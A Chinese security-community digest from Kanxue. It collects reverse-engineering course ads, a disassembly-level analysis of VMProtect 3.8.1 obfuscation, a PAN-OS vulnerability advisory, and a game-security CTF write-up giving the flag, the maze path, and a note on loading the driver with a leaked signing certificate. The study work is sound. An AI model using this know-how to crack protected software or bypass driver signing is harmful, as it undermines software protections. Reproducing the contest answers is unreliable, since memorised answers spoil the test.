资讯来源：综合 The Hacker News 等外媒报道及 vm2 官方更新日志

球分享

球点赞

球在看

点击阅读原文查看更多

https://www.kanxue.com/book-135-6050.htm

速学！今日同步更新2门课程

Thu, 07 May 2026 18:06:00 +0800

看雪课程 2026-05-07 18:06 上海

《基于CVD的云手机定制与风控分析》

2.12 集成GMS

4.4 apatch

https://www.kanxue.com/book-135-6040.htm

报名入口

🔍 报名

《基于CVD的云手机定制与风控分析》

💰¥2499

《内核攻防高级班：Windows内核攻防实战》

3-1 公共基础库集成

https://www.kanxue.com/book-227-5897.htm

3-2 应用态内核态通信方案全解（上）

https://www.kanxue.com/book-227-5898.htm

3-3 应用态内核态通信方案全解（中）

https://www.kanxue.com/book-227-5899.htm

3-4 应用态内核态通信方案全解（下）

https://www.kanxue.com/book-227-5900.htm

报名入口

🔍 报名

《内核攻防高级班：Windows内核攻防实战》

💰¥16200

球分享

球点赞

球在看

点击阅读原文查看更多

https://bbs.kanxue.com/user-home-1004848.htm

VMProtect 3.8.1 混淆策略大揭秘

Wed, 06 May 2026 17:59:00 +0800

阿强 2026-05-06 17:59 上海

看雪论坛作者ID：阿强

自从VMProtect 3.5.1 被爆出源码泄露开始直到最后的那一两个最重要的源文件也被公之于众之后，VMProtect 3.5.1算是在所有的逆向开发人员面前裸奔了。

有意思的是VMProtect并没有就此一蹶不振，反而绝地反击，它的实力和之前相比反而变得更强了，这是怎么回事呢？

这里面我们八卦一下，扒一扒他的版本，源码完全流出直到论坛上有大神分享编译的文章这时候是 2023年12月份左右，我们记住这个时间点，当我们全民都拥有源码的时候，其实VMProtect早已脱胎换骨了，我们来到他的官网https://vmpsoft.com/news/page/3/可以找到他的更新日志。

我们可以看到这里增加好的选项，这些选项可不是简简单单的混淆，每一个拿出来都是王炸，毫不夸张的说如果3.8版本之后的VMProtect是一位浑身都是的肌肉的猛男。

那么3.8版本之前的VMProtect只能算是一个娇羞的小萝莉，我们可以看到3.8更新的时间点是2023年初，这里我们大家可以讨论一下VMProtect3.8的大更新是不是因为源码泄露而做出的紧急补救手段。因为VMProtect3.8发布的时间恰巧也是源码泄露的那段时间，当时我第一次得知VMProtect源码泄露的时候，还以为VMProtect就此跌落神坛，从此一蹶不振，没想到他居然放出大招，这次的大更新可以将其称之为新版VMProtect。

它不是像牙膏厂一样挤药膏似的更新，而是夸张到等同于重构了整个源码，增加了非常多的变态混淆策略，在很多地方都进行了非常大的改动。那么接下来我们将逐一分析他的逆天改动。

第1点：全指令变形，但凡能够使用替代指令几乎都使用了，目前只有异或解密指令没有进行混淆。

其他所有指令都或多或少有一两种变体，大家也可以联想到他们变种的样子，这里我举几个例子。

伪代码解密：

00422864 | xoral,byteptrss:[ebp+edx-0x7]//伪代码读取指令有四种变体    
00422868 | xoral,bl//无法变形，维持原样            
0042286A | jmp123.vmp模版+部分.42BE65
0042BE65 | adddwordptrss:[esp+edx*2+0x2],0xC8169CA3     |
0042BE6D | incal
0042BE6F | xchgwordptrss:[esp+edx+0x1],dx               |
0042BE74 | movdwordptrss:[esp+edx*8-0x729D0],edx        |
0042BE7B | shldwordptrss:[esp+edx-0xE53B],0x57          |
0042BE83 | xoral,0xA6
0042BE85 | leaedx,dwordptrds:[edx*2+0x2FBCE804]         |
0042BE8C | incdl                                          |
0042BE8E | setedl                                         |
0042BE91 | decal
0042BE93 | jmp123.vmp模版+部分.5088D5                         |
005088D5 | call123.vmp模版+部分.5074A0                        |
005074A0 | negal
005074A2 | popedx                                         |
005074A3 | addedx,0xFFF7AC3A                              |
005074A9 | jmpedx                                         |
00483514 | movedx,0x119DB08A
00483519 | xchgbyteptrss:[esp+edx*4-0x4676C225],dl      |
00483520 | addal,0x9E
00483522 | leaedx,dwordptrds:[edx+edx*4+0x11B81E34]
00483529 | xaddwordptrss:[esp+edx-0x69CC901C],dx        |
00483532 | xorbl,al//无法变形，维持原样

伪代码读取指令的五种可能形式：

moveax，dwordptrss:[esi]//原始版本
xoreax,eax//新增前置eax清零指令，也可以是其他清零指令
addeax，dwordptrss:[esi]//变体1
xoreax，dwordptrss:[esi]//变体2
oreax，dwordptrss:[esi]//变体3
adceax，dwordptrss:[esi]//变体4

计算Handler地址：

004C9172 | moveax,dwordptrss:[ebp-0x4]//读取伪代码
004C9176 | jno123.vmp模版+部分.46E996
0046E996 | movedx,0x581983A                               |
0046E99B | xoreax,ebx
0046E99D | roreax,0x1
0046E99F | addedx,edx                                     |
0046E9A1 | bswapeax
0046E9A3 | pushedx                                        |
0046E9A4 | shlbyteptrss:[esp+edx*8-0x5819839E],0x84     |
0046E9AC | inceax
0046E9AD | jmp123.vmp模版+部分.490ABF                         |
00490ABF | orwordptrss:[esp+edx*8-0x581983A0],dx        |
00490AC7 | movsxecx,dx                                    |
00490ACA | roleax,0x2
00490ACD | shldwordptrss:[esp+edx-0xB033074],cl         |
00490AD4 | xorebx,eax//解密加数完成           
00490AD6 | orcl,byteptrss:[esp+edx-0xB033071]//增加前置cf标志清零指令，执行完cf = 0
00490ADD | adcedi,eax//add指令的变体

第2点：内存地址常数加密，一条包含内存操作数的指令，那么他的内存操作数通常有几种情况。

只有内存地址常数例如 mov eax,dword ptr ss:[0x123]
只有基址寄存器 mov dword ptr ss:[esp], 0x123
基址寄存器+索引寄存器+内存地址常数 mov dword ptr ss:[esp+edi+0x123], 0x123

如果内存地址常数0也算进去，那么一条包含内存操作数的指令，他的内存操作数就都含有内存地址常数，那么这个内存地址常数就可以被用来加密了。

//这条指令此时伪代码寄存器是ebp，这时候的ecx是07400000，那么这里面的内存地址常数
//其实是-5,这个-5加上ebp就是当前伪代码的指针
00433C60 | movzx eax,byte ptr ds:[ecx+ebp-0x7400005]     
00433C68 | ror ecx,0x77                                    |
00433C6B | not cx                                          |
00433C6E | and cl,cl                                       |
00433C70 | xor al,bl

写到这里有些人可能觉得这样子有什么意义呢？除了让代码变得更加复杂难看点，其他还有什么作用呢？这个问题问的好，作者可不是这么想的，他的每一个地方的改动都是根据编写分析插件的思路来的，我猜测原作者团队里面应该有专门开发分析插件的部门，他的每一次更新都是会收集所有能够找到的分析资料进行修复，那么这些改动对于我们编写分析插件来说影响是相当大的，3.8之前还能使用指令文本特征进行匹配从而来识别Handler的方法这里已经完全失效了。

第3点：Handler的变形，这里面的Handler变形只存在于包含计算虚拟寄存器地址的Handler。

handler PushVR32：

004BF2B6 | movzxeax,byteptrss:[ebp-0xB]//读取伪代码
004BF2BB | xoral,bl
004BF2BD | movecx,dwordptrss:[esp+0xC]
004BF2C1 | addecx,0xFFFEE8B1                              |
004BF2C7 | jmpecx                                         |
0044D3C2 | negal
0044D3C4 | incal
0044D3C6 | negal
0044D3C8 | movedx,dwordptrss:[esp+0x2D]                 |
0044D3CC | notedx                                         |
0044D3CE | incal
0044D3D0 | movzxecx,dx
0044D3D3 | xorbl,al//解密出偏移                
0044D3D5 | addecx,0xD3A68C98
0044D3DB | leaeax,dwordptrss:[esp+eax+0x3C]//算出虚拟寄存器地址 
0044D3DF | oredx,edx                                      |
0044D3E1 | xchgdwordptrss:[esp+0x1C],edx
0044D3E5 | adcedx,0xFFFD3506                              |
0044D3EB | jmpedx                                         |
0042075C | movedx,dwordptrds:[eax]//取出虚拟寄存器的值
0042075E | movdwordptrds:[esi-0x1C],edx//值写入虚拟栈

变形后：

00420766 | leaecx,dwordptrss:[esp+ecx-0x2C596EE3]//算出虚拟寄存器地址 
0042076D | moveax,dwordptrds:[ecx]//取出虚拟寄存器的值  
0042076F | movdwordptrds:[esi-0x20],eax//值写入虚拟栈

第4点：Handler的一级融合，这里面Handler与Handler之间本来是上一条Handler执行完在结尾跳到下一条handelr去执行，那么每条Handler中都有一个专门计算下一条handelr地址的代码块，这个代码块都有读取伪代码的操作，经过融合后，下一条用来计算handelr地址的伪代码被丢弃了，同时计算下一条handelr地址的代码块也没有了。

那么两条Handler使用跳转指令或者直接连接变成一条Handler，那么后面的Handler同样可以这样子接上去，有点像人体蜈蚣。

//第一条handler PushVR32的变形
00479089 | movdwordptrss:[esp+edx*2-0x2],edx
0047908D | subdwordptrss:[esp+edx*2+0x16],0x8B38041C    |
00479095 | movzxeax,byteptrss:[esp+edx+0xA]             |
0047909A | leaecx,dwordptrss:[esp+edx+0x55]//算出虚拟寄存器地址 
0047909E | moveax,dwordptrds:[ecx+edx-0x3]//取出虚拟寄存器的值  
004790A2 | shldx,0x68                                     |
004790A6 | movdwordptrds:[edi+edx*8-0x1808],eax//值写入虚拟栈
//第二条handler PushVR32的变形
004790AD | moveax,edx
004790AF | xaddbyteptrss:[esp+edx-0x2F9],dl             |
004790B7 | call123.vmp模版+部分.4B01CD                        |
004B01CD | leaecx,dwordptrss:[esp+edx*4-0xB80]//算出虚拟寄存器地址 
004B01D4 | jo123.vmp模版+部分.520FD5                          |
004B01DA | moveax,dwordptrds:[ecx+edx*8-0x1800]//取出虚拟寄存器的值      
004B01E1 | leaecx,dwordptrds:[edx+edx*2+0x6BAEF303]     |
004B01E8 | movdwordptrds:[edi+edx*4-0xC0C],eax//值写入虚拟栈
//第三条handler PushVR32的变形
004B01EF | leaecx,dwordptrds:[edx+edx-0x50DA8F6D]
004B01F6 | ordl,byteptrss:[esp+edx-0x2FB]               |
004B01FD | negedx                                         |
004B01FF | leaeax,dwordptrss:[esp+0x44]//算出虚拟寄存器地址   
004B0203 | rordwordptrss:[esp+0xF],cl                   |
004B0207 | popecx                                         |
004B0208 | addecx,0xFFFDC76A                              |
004B020E | jmpecx                                         |
00455826 | popedx                                         |
00455827 | movedx,dwordptrds:[eax]//取出虚拟寄存器的值  
00455829 | call123.vmp模版+部分.44DAE9                        |
0044DAE9 | movdwordptrds:[edi-0x10],edx//值写入虚拟栈

第5点：Handler的二级融合，在一级融合的基础上还有二级融合，比如执行模拟加法运算的Handler组合。首先第一条Handler是从伪代码读取常数作为加数，第二条Handler是从伪代码读取常数作为被加数，第三条Handler是执行加法运算，以前的handler逻辑是第一条和第二条handler，从伪代码读取到加数和被加数都是放到虚拟栈中去。然后第三条加法handler从虚拟栈中获取两个加数和被加数再执行ADD指令，在这里他把值放到虚拟栈中的指令给丢弃了，直接绑定了对应的寄存器。

例如第一条Handler读取的值存放到eax，第二条Handler读取的值存放到ecx,第三条handelr直接执行add eax,ecx,算出的结果在eax，同样可以不放到虚拟栈中，参与第四条handler的运算。

//PushVR8点变形
0043B239 | leaedx,dwordptrss:[esp+0x50]//算出虚拟寄存器地址    
0043B23D | movecx,0x489D36B2                              |
0043B242 | sarecx,0x45                                    |
0043B245 | rorcl,0x67                                     |
0043B248 | movzxcx,byteptrds:[ecx+edx-0x244E96B]//取出虚拟寄存器的值存入cx
0043B251 | jb123.vmp模版+部分.48BAC5                          |
0043B257 | moveax,0xFF9BE60E                              |
0043B25C | movdx,cx//将cx的值转移到dx，这个其实也可以算作一个混淆大点
0043B25F | shleax,0xB1//到这来并没有将读取到的值存入到虚拟栈中去         
//PopVR8
0043B262 | movzxecx,byteptrss:[ebp-0x6]//读取伪代码   
0043B267 | popeax                                         |
0043B268 | addeax,0xD15B                                  |
0043B26D | jmpeax                                         |
00499668 | xorcl,bl
0049966A | moveax,0x822BE31F
0049966F | shlal,0xC6                                     |
00499672 | subax,0x923B                                   |
00499676 | xorcl,0x3E
00499679 | notcl
0049967B | jmp123.vmp模版+部分.4570F0                         |
004570F0 | pusheax                                        |
004570F1 | addcl,0xA3
004570F4 | xorax,ax                                       |
004570F7 | rorcl,0x1
004570F9 | shleax,0x4D                                    |
004570FC | sareax,0xB7                                    |
004570FF | xorbl,cl//解密出偏移       
00457101 | negal                                          |
00457103 | subax,0xEC15                                   |
00457107 | sbbeax,eax                                     |
00457109 | leaecx,dwordptrss:[esp+ecx+0x4]//算出虚拟寄存器地址  
0045710D | roral,0xC1                                     |
00457110 | movbyteptrds:[ecx],dl//将dl值写入虚拟寄存器中

第6点：寄存器的释放，我们知道 ebp,esi,edi这三个轮转寄存器都有各自的功能，在一个流程块快结束的时候，也就是快要执行虚拟机退出Handler的时候，当某一条Handler之后的handler不再读取伪代码指令或者计算下一条handler的地址的时候，其相应的寄存器会被释放。

比如说伪代码寄存器或者调度寄存器的值进行随意赋值或者将其用作加密内存地址常数的寄存器，这么做表面上看起来毫无意义，但是在我们开发插件的代码中就需要进行非常大的逻辑改动了。

果然原作者还是自己会先把自家VMProtect给狂扁一顿：

//执行跳转到下一条Handler
0042E08C | jmpebp
//PushVR32     
004DF21B | jmp123.vmp简单+最大保护.4E7299
004E7299 | movecx,0xEC3505BA                              |
004E729E | movzxeax,byteptrds:[esi-0x1]//读取伪代码
004E72A2 | movsxebp,cl//调度寄存器ebp的值被释放
004E72A5 | xoral,bl
004E72A7 | roral,0x1
004E72A9 | jmp123.vmp简单+最大保护.4F5E38                       |
004F5E38 | movzxedx,cl                                    |
004F5E3B | addal,0x98
004F5E3D | movsxesi,dl//调度寄存器ebp的值被释放
004F5E40 | pushedx                                        |
004F5E41 | notwordptrss:[esp+edx*4-0x2E8]               |
004F5E49 | notal
004F5E4B | rolal,0x1
004F5E4D | decdl                                          |
004F5E4F | andecx,dwordptrss:[esp+edx*8-0x5C8]          |
004F5E56 | jge123.vmp简单+最大保护.4AD5DC                       |
004AD5DC | decal
004AD5DE | xorbl,al//伪代码解密完成
004AD5E0 | notcx                                          |
004AD5E3 | rolwordptrss:[esp+ecx-0xFAFE],0xA7           |
004AD5EC | leaeax,dwordptrss:[esp+eax+0x4]// 算出虚拟寄存器
004AD5F0 | shldx,0xEE                                     |
004AD5F4 | sbbecx,0x39B0CEB2                              |
004AD5FA | movedx,dwordptrds:[eax+edx*4-0x10000]//读取虚拟寄存器的值
004AD601 | movdwordptrds:[edi-0x4],edx//值存入虚拟栈
//PushVR32的变形
004AD604 | leaedx,dwordptrss:[esp+0x4C]// 算出虚拟寄存器       
004AD608 | movecx,dwordptrds:[edx]//读取虚拟寄存器的值
004AD60A | subesi,ebp                                     |
004AD60C | movsxeax,byteptrss:[esp+esi*8]               |
004AD610 | pusheax                                        |
004AD611 | movdwordptrds:[edi+esi-0x8],ecx//值存入虚拟栈
// VMExit 离开虚拟机
004AD615 | movedx,ebp
004AD617 | leaesp,dwordptrss:[esp+0x8]                  |
004AD61B | leaesp,dwordptrds:[edi+esi-0x8]//虚拟栈指针还给esp
004AD61F | leaebx,dwordptrds:[eax-0x3B72475A]           |
004AD625 | popebp//恢复到真实ebp
004AD626 | shrbl,0x41                                     |
004AD629 | popecx//恢复到真实ecx
004AD62A | setnpbl                                        |
004AD62D | shldl,0x47                                     |
004AD630 | notsi                                          |
004AD633 | popfd//恢复到真实eflag
004AD634 | bswapesi                                       |
004AD636 | popeax//恢复到真实eax
004AD637 | popedi//恢复到真实edi
004AD638 | popesi//恢复到真实esi
004AD639 | popedx//恢复到真实edx
004AD63A | popebx//恢复到真实ebx
004AD63B | call123.vmp简单+最大保护.495550                      |
00495550 | leaesp,dwordptrss:[esp+0x4]                  |
00495554 | ret//离开虚拟机返回到真实指令

第7点：轮转寄存器和解密寄存器的偷换，这是我在分析万用门handler的时候发现的，万用门handler算是虚拟机中比较敏感的handler了，这类handler通常都是找jcc爆破的关键handler，所以说作者在这方面应该是加固加固再加固的。

怎么换呢？这里面先将虚拟栈寄存器ebp的值给eax,那么eax这时候就是ebp的分身了。这样子，我们在判断某一条指令是不是读取虚拟栈内存的时候是不是就变得困难了，这里面可能还包括伪代码寄存器也会这样做，目前我还没发现。

//PushVStack 这是虚拟栈寄存器存入虚拟栈的Handler
004F61DF | movecx,esi//当前虚拟栈寄存器是esi值给ecx
004F61E1 | rordl,0xC5                                     |
004F61E4 | jae123.vmp模版+部分.556582                         |
004F61EA | movdwordptrds:[esi+eax*4-0x8AA4860],ecx//ecx值存入虚拟栈
//Dispatcher 计算下一条Handler地址
004F61F1 | oral,ah
004F61F3 | moveax,dwordptrss:[ebp+eax*2-0x4552532]//读取伪代码  
004F61FA | pushedx                                        |
004F61FB | leaedx,dwordptrds:[edx+edx+0x4A284788]       |
004F6202 | leaebp,dwordptrss:[ebp+edx-0x4A2848FC]
004F6209 | movsxecx,dl                                    |
004F620C | jne123.vmp模版+部分.431ABA                         |
00431ABA | xoreax,ebx
00431ABC | subeax,0x91B19C05
00431AC1 | call123.vmp模版+部分.4A467A                        |
004A467A | adddx,cx                                       |
004A467D | noteax
004A467F | movdwordptrss:[esp+edx-0x4A2848F0],ecx       |
004A4686 | xoreax,0x4122C6BE
004A468B | xorcl,0x27                                     |
004A468E | subedx,0xF40FEF8C                              |
004A4694 | deceax
004A4695 | call123.vmp模版+部分.43DAFA                        |
0043DAFA | shlecx,0x96                                    |
0043DAFD | oredx,edx                                      |
0043DAFF | xorebx,eax//伪代码解密完成
0043DB01 | addedi,eax//edi是调度寄存器，计算下一条Handler地址     
//Nor32 这是一个万用门Handler       
0043DB03 | pushecx
0043DB04 | subcx,wordptrss:[esp+edx-0x56185964]         |
0043DB0C | incdx                                          |
0043DB0F | moveax,dwordptrds:[esi+edx-0x56185969]//从虚拟栈取出前面压入的虚拟栈指针
0043DB16 | popecx                                         |
0043DB17 | movedx,dwordptrss:[eax+edx-0x56185965]//这条指令相当于从虚拟栈中读取参数1
0043DB1F | jo123.vmp模版+部分.449C0D                          |
0043DB25 | inccl                                          |
0043DB27 | moveax,edx//将参数1从eax转移到edx
0043DB29 | popecx                                         |
0043DB2A | adcecx,0x2C648                                 |
0043DB30 | jmpecx                                         |
004D0CE2 | jmp123.vmp模版+部分.4F19A1                         |
004F19A1 | movedx,dwordptrds:[esi]//从虚拟栈中读取参数2
004F19A4 | movecx,0xD886303E
004F19A9 | noteax//取反参数1
004F19AB | deccx                                          |
004F19AE | rorcl,0x27                                     |
004F19B1 | notedx//取反参数2
004F19B3 | shlbyteptrss:[esp+0x2],0x42                  |
004F19B8 | orecx,ecx//执行或运算
004F19BA | andeax,edx                                     |
004F19BC | movdwordptrds:[esi],eax//结果存放到虚拟栈

以上就是 VMProtect 3.8.1 核心混淆策略的全拆解，高版本 VMP 的全指令变形、Handler 多级融合、内存常数加密等机制，看似彻底阻断逆向分析，实则有完整的破解思路与落地方法。

如果想把文章里的理论变成可实战的逆向能力，彻底搞定高版本 VMP 逆向、Handler 抗变形识别、x32/x64 调试器插件开发，欢迎关注课程：《VMProtect 分析与调试器插件开发》从 VMP 底层架构到插件实战开发，全程带你啃下高版本 VMP 逆向硬骨头。

VMProtect分析与调试器插件开发-999元

看雪ID：阿强

*本文为看雪论坛优秀文章，由阿强原创，转载请注明来自看雪社区

# 往期推荐

Ptrace注入代码在不同平台的区别（ARM64、x86-64、MIPS64）

浅谈梯度分析与样本对抗：以vlm和ddddocr为例

ANDROID 黑科技 : 保活机制深度逆向

更好理解：CVE-2021-1732漏洞分析报告与利用

LLVM Pass编写及去除 —— 控制流平坦化

球分享

球点赞

球在看

点击阅读原文查看更多

Palo Alto PAN-OS 高危漏洞已遭在野利用：可获root权限，官方下周发补丁

Wed, 06 May 2026 17:59:00 +0800

看雪学苑 2026-05-06 17:59 上海

暂无正式补丁，务必限制门户访问或立即禁用

Palo Alto Networks 本周发布紧急安全公告，确认旗下 PAN-OS 操作系统存在一处严重的缓冲区溢出漏洞，编号 CVE-2026-0300。该漏洞允许未经身份验证的远程攻击者向 PA 系列和 VM 系列防火墙发送特制数据包，从而以 root 权限执行任意代码，相当于完全控制设备。

漏洞的危害程度与部署方式密切相关。如果 User-ID 认证门户（即强制门户）被配置为可从互联网或任何非可信网络访问，风险评分将达到 CVSS 9.3 分（严重级）；而若严格限制仅允许受信任的内部 IP 访问，评分则降至 8.7 分。

Palo Alto Networks 证实，该漏洞已被攻击者用于“有限的在野利用”，具体活动瞄准了那些将 User-ID 认证门户暴露在公网上的环境。受影响的 PAN-OS 版本覆盖多个主流分支，包括：

- PAN-OS 12.1 部分版本（低于 12.1.4-h5 或 12.1.7）

- PAN-OS 11.2 部分版本（低于 11.2.4-h17、11.2.7-h13 等）

- PAN-OS 11.1 部分版本（低于 11.1.4-h33、11.1.15 等）

- PAN-OS 10.2 部分版本（低于 10.2.7-h34、10.2.18-h6 等）

值得注意的是，目前该漏洞尚无正式修复补丁。Palo Alto Networks 计划从 2026 年 5 月 13 日起陆续发布各版本的修复程序。在这段窗口期内，用户面临较高的攻击风险，尤其是公开暴露该服务的企业。

为此，官方强烈建议立即执行以下缓解措施，以最大限度降低风险：

将 User-ID 认证门户的访问范围限制在可信内部区域；
如业务上未实际用到该门户，直接将其禁用。

安全团队应尽快检查防火墙策略，确认 User-ID 认证门户是否开启，并审查相关访问控制列表。如果暂无法禁用，务必把访问源限制在可信的管理网段内，杜绝来自互联网的请求。此次威胁不涉及云防火墙及 Panorama 管理器，仅影响使用了 User-ID 认证门户的 PA 系列硬件防火墙和 VM 系列虚拟防火墙。

资讯来源：Palo Alto Networks 官方安全公告及公开报道

球分享

球点赞

球在看

点击阅读原文查看更多

效率提升10倍！高版本VMP逆向+插件开发全流程

Wed, 06 May 2026 17:59:00 +0800

看雪课程 2026-05-06 17:59 上海

从0到1开发x32/x64Dbg插件，搞定高版本VMP

做逆向的朋友，你是不是也遇到过这种情况：拿到一个加了壳的程序，一眼认出是VMProtect，心里瞬间咯噔一下——低版本还能靠着经验手动扒一扒，碰到3.5以上的新版本，直接无从下手。handler藏得深，变形玩得花，盯了两三天，连VmEntry都理不明白。

想找资料学，网上全是碎片教程，要么只讲基础原理，要么停留在古老版本，真遇到高版本VMP，还是卡得一动不动。

想自己写分析插件，不知道从哪切入，调试器环境搭了半天，连API调用都搞不清。

更扎心的是：企业项目里，你拿不下高版本VMP，核心项目轮不到你，技术进阶永远卡在这一步。

但VMP真的那么无解吗？其实，你缺的不是能力，而是一套系统的方法和趁手的工具。

999元

15小时，让你具备应付高版本VMP的实力

这门专门针对VMProtect的分析与调试器插件开发课程，就是帮你打开VMP世界大门的钥匙：从底层原理拆解，到32/64位双平台插件落地，从0到1教你搞定高版本VMP对抗，把核心硬技能攥在自己手里。

为什么是这门课？

帮你把"纯理论"变成"能干活的工具"

市面上讲VMP的内容少之又少——要么太浅，只够入门；要么只讲分析，不讲开发。学完依然只能手动硬怼，效率低到崩溃。

这门课不一样：我们边逆向分析，边写插件。你学到的每一个知识点，都直接落地成能用来干活的工具。

整个课程逻辑清晰，从基础到实战层层递进：

✅ 先搞懂底层——从VMP工作模型到插件切入点，把零散知识串成体系

✅ 再手把手开发——x32Dbg环境搭建、API调用、handler识别，一步步写出第一个VMP分析插件

✅ 最后升级适配——搞定x86/x64双平台差异，掌握新版本对抗思路

✅ 全程实战——所有知识点围绕“开发出能用的VMP分析插件”推进，学完就能用

全程没有枯燥的理论堆砌，所有知识点都围绕"开发出能用的VMP分析插件"这个目标推进，学完就能用在自己的日常逆向工作中。

学完这门课，你能获得什么？

打破高版本VMP壁垒

不再被新版VMP拒之门外，系统掌握加密逻辑拆解和对抗思路，企业级项目难题也能啃下来

落地可复用的工具

独立开发出x32Dbg/x64Dbg专用VMP分析插件，直接用在工作里，把手动分析的效率提升十倍

补齐逆向核心硬技

吃透虚拟机保护、handler识别、反汇编引擎、调试器插件开发这些核心能力，逆向功底直接上一个台阶

具备持续迭代能力

掌握新版本VMP适配思路，哪怕后续VMP更新，你也能自己调整插件，不用再等别人的教程

最关键的是：你再也不用因为"拿不下VMP"，眼睁睁看着好机会从手里溜走——成为团队里能啃硬骨头的逆向工程师，职场竞争力直接拉满。

课程目录

第一章课程介绍

课程介绍
vmp工作模型与插件切入点
修改vmp3.5.1源码
分析vmp3.5.1加密程序
搭建x32Dbg插件开发环境

第二章开发x32Dbg插件

x32Dbg插件trace功能
反汇编引擎BeaEngine
分析VmEntry（上）
分析VmEntry（中）
分析VmEntry（下）
识别handler（上）
识别handler（中）
识别handler（下）
Handler识别抗变形策略
输出结果（上）
输出结果（中）
输出结果（下）
插件实战分析（上）
插件实战分析（中）
插件实战分析（下）

第三章开发x66Dbg插件

x86与x64VMProtect差异概览
x64Dbg插件trace功能
分析VmEntry（上）
分析VmEntry（中）
分析VmEntry（下）
识别handler（上）
识别handler（中）
识别handler（下）
输出结果（上）
输出结果（中）
输出结果（下）

第四章 vmp插件开发总结

如何适配新版本vmp
插件开发中最容易踩的坑

常见问题

Q: 课程是录播还是直播？有学习期限吗？

A: 课程为录播形式，报名后永久可看，随时学习，不限次数回放。

Q: 学习中遇到问题怎么办？有答疑吗？

A: 报名后进入专属学员群，讲师本人在线答疑，遇到卡点随时问，不让问题过夜。

Q: 学完能达到什么水平？能独立分析VMP加壳的程序吗？

A: 学完后你不仅能独立分析VMP加壳程序，还能亲手开发分析插件，把手动效率提升十倍以上。具备应对高版本VMP的能力，不再是“只会用工具”的分析者。

Q：我没有VMP基础，能学吗？
A：课程从基础原理讲起，只要你有x86逆向基础，就能跟上。

Q：课程提供源码吗？
A：提供完整的插件源码，以及分析过程中使用的工具和脚本。

Q：学完能破解最新版VMP吗？
A：课程重点培养方法论和适配能力，学完后你具备应对新版本的能力，而非仅针对特定版本。

限时特惠：999元

逆向的世界没有银弹，但有捷径

站在高手的肩膀上，少走弯路

球分享

球点赞

球在看

点击阅读原文报名

https://bbs.kanxue.com/user-home-1001108.htm

2026年腾讯游戏安全初赛-PC方向

Tue, 05 May 2026 18:22:00 +0800

江树 2026-05-05 18:22 上海

看雪论坛作者ID：江树

仅为本人题解，并非参考答案不能保证正确，请参照官方公布题解。

〇、得分点

如何加载驱动

关掉ACE预启动，随便签一个泄露签名，即可加载驱动，稳定性极高，就蓝屏了两次。

Flag

flag{SHAD0WNT_HYPERVMX}

最短路径

DDDDDDSSDDDDWWDDSSSSSSSSAASSSSDD
//格式化为
RRRRRRDDRRRRUURRDDDDDDDDLLDDDDRR

地图

###########################
#S . . . . . .#.#. . . . .#
############# ####### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
############# ####### ### #
#. . . . .#.#. . . . .#.#.#
# ####### ############### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ####### ############### #
#.#.#. . . . . . . . .#.#.#
# ### ### ########### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ### ### ########### ### #
#.#.#.#.#.#.#. . .#.#.#.#.#
# ### ####### ### ####### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ### ####### ### ####### #
#.#.#. . . . .#.#.#.#. . .#
# ############### ### #####
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ############### ### #####
#. . .#.#. . .#.#.#.#.#.#.#
##### ### ### ### ### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
##### ### ### ### ### ### #
#. . . . .#.#.#.#. . . . E#
###########################

五个泄漏点（最后一个可能有误）

1. 两个对象名

①MazeMoveOK 事件

类型：命名事件
对象名：Global\MazeMoveOK
驱动侧实现：ZwOpenEvent + ZwSetEvent
含义：成功相关反馈槽位

②MazeMoveWall 事件

类型：命名事件
对象名：Global\MazeMoveWall
驱动侧实现：ZwOpenEvent + ZwSetEvent
含义：失败/撞墙相关反馈槽位

2. 两个 GUID

①GUID1 命名信号量

类型：命名信号量
对象名：

Global{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}

驱动侧实现：

解码对象名
ObReferenceObjectByName
KeReleaseSemaphore

含义：成功相关反馈槽位

②GUID2 命名信号量

类型：命名信号量
对象名：

Global{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E}

驱动侧实现同上
含义：失败/撞墙相关反馈槽位

3. LastError

类型：线程用户态上下文回写
驱动侧关键函数：sub_140316ADF
关键行为：

写+0x68 （TEB -> LastErrorValue）

写入值包括：

0xC0DE0001 -> ok
0xC0DE0000 -> wall

4. ZwSetInformationObject

每次move前先调用SetHandleInformation(h, HANDLE_FLAG_PROTECT_FROM_CLOSE, 0)进行清零，在move后调用GetHandleInformation(h, &flags)

if( flags & HANDLE_FLAG_PROTECT_FROM_CLOSE !=0)
   handle_ok =true
else
   handle_ok =False

handle_ok = True

表示：成功

handle_ok = False

表示：失败/撞墙

5. KeDelayExecutionThread

函数会通过KUSER_SHARED_DATA访问TickCountLowDeprecated，并且在异或后被编码进入返回缓冲，可以在用户层恢复被驱动使用的这个Tick值。

tick_xor = struct.unpack_from(", raw, 0)[0]
tick = tick_xor ^ 0xBAADF00D

然后计算

predicted_ms = (tick % 50) + 10

就是理论上这个线路被延时的毫秒数，然后我们可以计算一个IO请求的耗时

 t0 = time.perf_counter()
 DeviceIoControl(...)
 time_ms = (time.perf_counter() - t0) * 1000.0

如果predicted_ms和time_ms很接近，就能说明本次触发到了该泄漏点，但是无法判断具体的结果。

很接近

表示：命中该泄漏点，应重试，直到命中前几个可明确结果泄漏点

不接近

表示：应观测其他泄漏点获取本次move的结果

总结

在二进制文件中放了大量的小混淆，导致不管是正向分析还是逆向分析，都不舒服，比如发现了某一个函数，发现xref不可用，因为上游的调用点有花指令，混淆等，导致了IDA不能正确分析，在驱动分析中尤其明显，但是由于驱动导入表暴露了大量的信息，所以都可以通过导入表入手，不完整的分析全流程，也能得到相关结论，如果赛题在导入函数上做手脚，比如动态解析，难度会更大。

很好本来都要提交了，感觉这个寻路脚本咋会这么慢，时间还不稳定，又重新用IDA看了一眼驱动，发现有随机的Sleep感觉大概率是没找齐全，然后就找到了之前没找到的两个泄漏点（但是他们没有影响我得到flag....）

一、赛题文件

文档：2026游戏安全技术竞赛-PC客户端安全-初赛.docx

#「宫殿」的验证机制并不寻常：系统由用户态控制台和内核驱动组成，驱动内部隐藏着一个加密迷阵，所有操作指令必须由控制台通过驱动接口下
# 发。表面上，系统不会对你的任何操作给出反馈——你无法直接判断每一步操作是成功推进，还是被防线拦截。

